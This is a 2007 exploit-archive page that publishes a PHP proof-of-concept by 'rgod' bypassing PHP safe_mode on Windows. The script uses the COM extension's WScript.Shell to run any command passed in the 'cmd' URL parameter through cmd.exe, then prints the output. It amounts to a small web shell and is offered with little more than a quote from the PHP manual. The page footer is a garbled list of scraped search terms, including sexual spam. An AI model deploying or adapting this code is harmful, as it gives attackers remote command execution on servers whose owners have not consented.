about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , PHP COM extensions (inconsistent Win32) safe_mode Bypass Exploit




2007-03-07 PHP COM extensions (inconsistent Win32) safe_mode Bypass Exploit
Rated as : High Risk

<?php
   //PHP COM extensions (inconsistent Win32) safe_mode bypass
   //by rgod

    $____suntzu = new COM("WScript.Shell");
    $____suntzu->Run('c:\windows\system32\cmd.exe /c
'.escapeshellarg($_GET[cmd]).' >
'.dirname($_SERVER[SCRIPT_FILENAME]).'/suntzoi.txt');
    $____suntzoi=file("suntzoi.txt");
    for ($i=0; $i<count($____suntzoi); $i++) {echo
nl2br(htmlentities($____suntzoi[$i]));}

   // *quote* from the php manual:
   // There is no installation needed to use these functions; they are
part of the PHP core.

   // The windows version of PHP has built in support for this extension.
You do not need to load any additional extension in order to use these
functions.

   // You are responsible for installing support for the various COM
objects that you intend to use (such as MS Word);
   // we don't and can't bundle all of those with PHP.
?>
securitydot.net - 2007-03-07

Advertising

Copyright 2007, SecurityDot
Tue, 15 Dec 2009 07:32:54 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Www.sexgir mambo Remo www.naruto Saxyvideo www.28hh.i www.naruto people hav www.njxing CMPS 2.1.0 www.tglue. nuked clan www.njxing Asik www.jjlgou mallu sex aion.ko180 news for C 02616.CN NetpIsRemo sexy club Tamilbluef mweK WPAD IPC WWW.IRANXI anh la vo maxcpm.inf Xxxanal cex3.com Crack+Data Www.Artis+ www.ttmoto anh la vo zhdzdz.com PHP Advanc openbook news for c www.szwda. 6.30 PHP Advanc www.inzhej 6.30 php-nuke 2 www.inzhej www.lmlq.c Apache www taruna www.bestse search/exp mambo Remo